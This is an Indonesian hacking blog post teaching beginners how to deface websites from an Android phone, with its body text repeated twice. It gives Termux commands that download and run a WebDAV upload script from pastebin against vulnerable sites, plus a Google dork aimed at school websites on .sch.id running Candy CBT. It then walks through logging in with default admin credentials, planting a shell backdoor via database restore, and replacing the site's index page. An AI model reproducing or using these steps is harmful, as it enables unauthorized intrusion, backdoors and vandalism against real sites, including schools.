Selamat datang kembali sobat bazengers di blog FHXploit! di postingan kita kali ini saya akan membahas tentang cara deface website di android yang paling gampang bahkan untuk pemula seperti saya pun bisa melakukanya.
banyak yang bertanya ke saya apakah melakukan deface web harus menggunakan pc? dan apakah spesifikasinya harus tinggi? tentu saja tidak karena kemampuan defacing ada pada skill bukan pada alatnya jadi tanpa komputerpun kalian masih bisa melakukan deface di android bahkan meskipun perangkat anda no root.
sebelumnya buat temen - temen yang belum tau tentang deface atau baru tau mengenai web deface di sini saya kasih penjelasan singkatnya dulu mengenai deface.
Deface atau web deface merupakan sebuah teknik untuk mengubah atau sebagian isi website secara tidak resmi atau tanpa izin pemiliknya, orang yang melakukan aksi deface merupakan defacer, biasanya para defacer hanya mmerubah tampilan indexnya saja atau halaman home page nya kemudian menggantinya dengan script dia sendiri.
sebenarnya ada banyak metode yang dapat di lakukan untuk mendeface sebuah website namun di sini saya hanya akan membahas teknik yang paling mudah dan paling banyak orang ingin tau yaitu teknik webdav menggunakan termux dan juga bypass admin login yang akan kita praktekan pada website sekolah.
baiklah langsung saja kita masuk ke tutorial 2 cara deface website menggunakan android
sudah tidak asing lagi bahwa termux memang sangat berguna sekali untuk perlengkapan hacking, bukan hanya itu termux juga bisa di gunakan untuk melakukan deface menggunkan methode webdav, silahkan simak langkah - langkah berikut ini.
Download dulu script defacenya : di sini
buka aplikasi termux kemudian jalankan perintah di bawah dengan urut
silahkan cari script deface yang sudah kalian download tadi di file manager kemudian ganti ke folder webdav dan juga ubah namanya menjadi index.html
kemudian silahkan kalian cari webvuln webdav, kalo gk tau cara nyarinya kalian bisa cari di google atau download kumpulan webvuln webdav di sini
masuk kembali ke aplikasi termux kemudian masuk ke folder webdav dengan peritntah
lalu jalankan webdavnya
silahkan kalian isi web target dengan web vuln webdav yang sudah kalian cari atau download di atas, tekan enter kemudian biarkan proses upload berjalan dengan lancar, jika ada tulisan [Y/n] pilih y lalu enter
untuk mengecek berhasil atau tidak silahkan kalian buka web yang sudah di targetkan tadi dengan browser, maka hasilnya akan seperti ini.
dan taraa webnya sudah berhasil di tebas :D
selanjutnaya kita masuk ke teknik yang ke dua, di sini kita akan mencoba untuk deface website sekolah yang berdomain .sch.id, di sini kita akan menggunakan cara yang paling mudah yaitu dengan teknik bypass admin yang bisa kalian lakukan di android tanpa aplikasi.
pertama silahkan kalian siapkan script defacenya kalian bisa buat sendiri atau download di google juga banyak.
yang kedua adalah siapkan dorknya silahkan kalian gunakan dork di bawah
ketikan dork tersebut di google nanti akan keluar daftar situs sekolah
silahkan kalian pilih website sekolah yang sekiranya vuln. pastikan kalian berada pada halaman login admin, jika belum ada kalian bisa tambahkan sendiri seperti situs.sch.id/admin/login.php
setelah halaman login muncul, isikan username admin dan juga password admin
kalo webnya emang vuln maka kalian akan langsung masuk ke halaman dashboard.
silahkan kalian masuk ke pengaturan, lalu cari restore database, kemudian kalian upload shell backdoor kalian
stelah terupload klik restore
setelah itu buka shell backdoor kalian misal berada di situs.sch.id/candy/admin/shell.php
masuk ke bagian public_html kemudian hapus file index.php

selanjutnya silahkan kaian upload scrip deface kalian jangan lupa nama script defacenya ubah menjadi index.php atau index.html
setelah script deface kalian selesai terupload silahkan kalian buka web terget di browser jika berhasil maka tampilan halaman depanya akan berubah menjadi script kalian.
demikan tutorial cara deface website untuk pemula yang bisa kalian terapkan di android root maupun no root menurut kalian gimana? lebih mudah yang menggunakan termux atau yang menggunakan dork? tulis pendapat kalian di komentar, sebaiknya teknik ini tidak di salah gunakan karena resiko di tanggung sendiri, semoga bermanfaat dan sampai jumpa di postingan berikutnya.
banyak yang bertanya ke saya apakah melakukan deface web harus menggunakan pc? dan apakah spesifikasinya harus tinggi? tentu saja tidak karena kemampuan defacing ada pada skill bukan pada alatnya jadi tanpa komputerpun kalian masih bisa melakukan deface di android bahkan meskipun perangkat anda no root.
sebelumnya buat temen - temen yang belum tau tentang deface atau baru tau mengenai web deface di sini saya kasih penjelasan singkatnya dulu mengenai deface.
Deface atau web deface merupakan sebuah teknik untuk mengubah atau sebagian isi website secara tidak resmi atau tanpa izin pemiliknya, orang yang melakukan aksi deface merupakan defacer, biasanya para defacer hanya mmerubah tampilan indexnya saja atau halaman home page nya kemudian menggantinya dengan script dia sendiri.
sebenarnya ada banyak metode yang dapat di lakukan untuk mendeface sebuah website namun di sini saya hanya akan membahas teknik yang paling mudah dan paling banyak orang ingin tau yaitu teknik webdav menggunakan termux dan juga bypass admin login yang akan kita praktekan pada website sekolah.
baiklah langsung saja kita masuk ke tutorial 2 cara deface website menggunakan android
Deface Website Methode Webdav di Termux
sudah tidak asing lagi bahwa termux memang sangat berguna sekali untuk perlengkapan hacking, bukan hanya itu termux juga bisa di gunakan untuk melakukan deface menggunkan methode webdav, silahkan simak langkah - langkah berikut ini.
Download dulu script defacenya : di sini
buka aplikasi termux kemudian jalankan perintah di bawah dengan urut
$cd /storege/emulate/0
$apt install wget
$apt install python
$apt install libcurl
$apt install openssl curl
$pip2 install urllib3
$pip2 install utllib3 chardet certifi idna requests
$mkdir webdav
$cd webdav
$wget https://pastebin.com/raw/HnVyQPtR -O webdav.py
silahkan cari script deface yang sudah kalian download tadi di file manager kemudian ganti ke folder webdav dan juga ubah namanya menjadi index.html

kemudian silahkan kalian cari webvuln webdav, kalo gk tau cara nyarinya kalian bisa cari di google atau download kumpulan webvuln webdav di sini
masuk kembali ke aplikasi termux kemudian masuk ke folder webdav dengan peritntah
$cd /sdcard/webdav
lalu jalankan webdavnya
$python2 webdav.py web_target index.html

silahkan kalian isi web target dengan web vuln webdav yang sudah kalian cari atau download di atas, tekan enter kemudian biarkan proses upload berjalan dengan lancar, jika ada tulisan [Y/n] pilih y lalu enter

untuk mengecek berhasil atau tidak silahkan kalian buka web yang sudah di targetkan tadi dengan browser, maka hasilnya akan seperti ini.

dan taraa webnya sudah berhasil di tebas :D
selanjutnaya kita masuk ke teknik yang ke dua, di sini kita akan mencoba untuk deface website sekolah yang berdomain .sch.id, di sini kita akan menggunakan cara yang paling mudah yaitu dengan teknik bypass admin yang bisa kalian lakukan di android tanpa aplikasi.
Cara Deface Website Sekolah
pertama silahkan kalian siapkan script defacenya kalian bisa buat sendiri atau download di google juga banyak.
yang kedua adalah siapkan dorknya silahkan kalian gunakan dork di bawah
intext:"support by candy cbt" site:.sch.id
ketikan dork tersebut di google nanti akan keluar daftar situs sekolah

silahkan kalian pilih website sekolah yang sekiranya vuln. pastikan kalian berada pada halaman login admin, jika belum ada kalian bisa tambahkan sendiri seperti situs.sch.id/admin/login.php

setelah halaman login muncul, isikan username admin dan juga password admin

kalo webnya emang vuln maka kalian akan langsung masuk ke halaman dashboard.

silahkan kalian masuk ke pengaturan, lalu cari restore database, kemudian kalian upload shell backdoor kalian

stelah terupload klik restore
setelah itu buka shell backdoor kalian misal berada di situs.sch.id/candy/admin/shell.php

masuk ke bagian public_html kemudian hapus file index.php


selanjutnya silahkan kaian upload scrip deface kalian jangan lupa nama script defacenya ubah menjadi index.php atau index.html

setelah script deface kalian selesai terupload silahkan kalian buka web terget di browser jika berhasil maka tampilan halaman depanya akan berubah menjadi script kalian.

demikan tutorial cara deface website untuk pemula yang bisa kalian terapkan di android root maupun no root menurut kalian gimana? lebih mudah yang menggunakan termux atau yang menggunakan dork? tulis pendapat kalian di komentar, sebaiknya teknik ini tidak di salah gunakan karena resiko di tanggung sendiri, semoga bermanfaat dan sampai jumpa di postingan berikutnya.
Terima Kasih Telah mengunjungi Blog FHXploit
Bantu kami mengembangkan Channel Youtube dengan Subscribe di Channel FHXploit.
Dan Jangan lupa terus kunjungi www.fhxploit.Com untuk melihat Artikel lainnya.
Klik Untuk BerKomentar
0 komentar